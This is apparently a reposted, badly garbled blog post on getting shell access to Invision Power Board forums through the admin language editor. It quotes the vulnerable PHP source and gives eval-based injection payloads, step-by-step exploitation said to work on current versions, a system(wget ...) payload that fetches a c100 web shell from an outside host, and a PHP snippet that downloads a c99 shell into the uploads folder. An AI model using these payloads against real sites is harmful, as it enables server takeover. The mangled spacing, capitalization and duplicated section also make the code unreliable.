IP. Board, SHELL Summary

Yjps blog

It was found that there were few discussions in China on this aspect, and some summary was reposted from overseas sites.

Http://mgsdl.free.fr /? 0: 18

6th Methods

VI-CODE EXECUTION

The ACP allows admins to manage ages, they can
Choose the default language, import a new one, and edit
Them. Lets take a look in the file "sources/action_admin/
Ages. php ":

65 | switch ($ this-> ipsclass-> input [code])
66 | {
... |
88 | case doedit:
89 | $ this-> ipsclass-> admin-> cp_permission_check (...);
90 | $ this-> save_langfile ();
110 | break;
... |
935 | function save_langfile ()
936 | {
... |
957 | $ lang_file = CACHE_PATH. "cache/lang_cache/". $ row [ldir].
... | "/". $ This-> ipsclass-> input [lang_file];
958 |
959 | if (! File_exists ($ lang_file ))...
... |
963 |
964 | if (! Is_writeable ($ lang_file ))...
... |
969 | $ barney = array ();
970 |
971 | foreach ($ this-> ipsclass-> input as $ k => $ v)
972 | {
973 | if (preg_match ("/^ XX _ (S +) $/", $ k, $ match ))
974 | {
975 | if (isset ($ this-> ipsclass-> input [$ match [0])
976 | {
977 | $ v = str_replace ("& #39;", "", stripslashes ($ _ POST [$ match [0]);
978 | $ v = str_replace ("& #60;", "<", $ v );
979 | $ v = str_replace ("& #62;", ">", $ v );
980 | $ v = str_replace ("& #38;", "&", $ v );
981 | $ v = str_replace ("", "", $ v );
982 |
983 | $ barney [$ match [1] = $ v;
984 |}
985 |}
986 |}

As you can see, theres several replacements which are
Made. Some HTML entities are converted to their applicable
Characters. The "stripslashes ()" function is also called.
But we dont really care about that, this will not cause
A problem, this was just to show you how users inputs
Are treated. Now lets see how the change is made:

993 | $ start = "<? Php ". $ lang = array (."";
994 |
995 | foreach ($ barney as $ key => $ text)
996 | {
997 | $ text = preg_replace ("/{1, }$/", "", $ text );
998 | $ start. = "". $ key. "=>" ". str_replace (", ", $ text )."",";
999 |}
1000 |
1001 | $ start. = ");? "."> ";
1002 |
1003 | if ($ fh = fopen ($ lang_file, w ))
1004 | {
1005 | fwrite ($ fh, $ start );
1006 | fclose ($ fh );
1007 |}

So, theres a protection against double quotes, not all
Escape characters. There are several ways to bypass this
Protection.

The first method, is to play with what we call "dynamic
Variables ". With two $, we can execute PHP code.
Example: $ {$ {@ eval ($ _ SERVER [HTTP_SH])}

The second one, is to use another escape character,
Backslash () will do the stuff. The attacker must change
Two inputs. Example:

First input: hello
Second input:); @ eval ($ _ SERVER [HTTP_SH]);/*

Exploitation

Code:

VI-CODE EXECUTION

The ACP allows admins to manage ages, they can
Choose the default language, import a new one, and edit
Them. Lets take a look in the file "sources/action_admin/
Ages. php ":
...

This trick is working even against current IPB version!
Just go to admin --> Look and Feel --> Manage ages

Then choose section, for example: public_help

Edit "help_txt", which originally is "Choose a topic from the list, or search for a topic"

Add some php code, so it becomes:

Code:

Choose a topic from the list, or search for a topic

$ {$ {Phpinfo ()}}

Save changes. Then go to help section:

Http: // localhost/ipb.3.0.0.rc2/index. php? App = core & module = help

... And php code will be executed

Or code:

$ {$ {Phpinfo ()}}
.......

$ {$ {System (wget http://blacknite.eu/php_shells/c100.txt )}}

And or:

Read conf_global.php from the admin panel using basic admin privilege

Code:
$ Linky = "http://www.evilc0der.com/c99.txt ";
$ Saved = "/home/path/towhatever/forum/uploads/shell. php ";
$ From = fopen ("$ linky", "r ");
$ To = fopen ("$ saved", "w ");
While (! Feof ($ from )){
$ String = fgets ($ from, 4096 );
Fputs ($ to, $ string );
}
Fclose ($ );
Fclose ($ from );

Root admin is required to know the path.

I tested this shell upload on IPB 2.3.6 and all was good
--------------------------------------

Forums/cache/lang_cache/en/lang_help.php

Forums/uploads/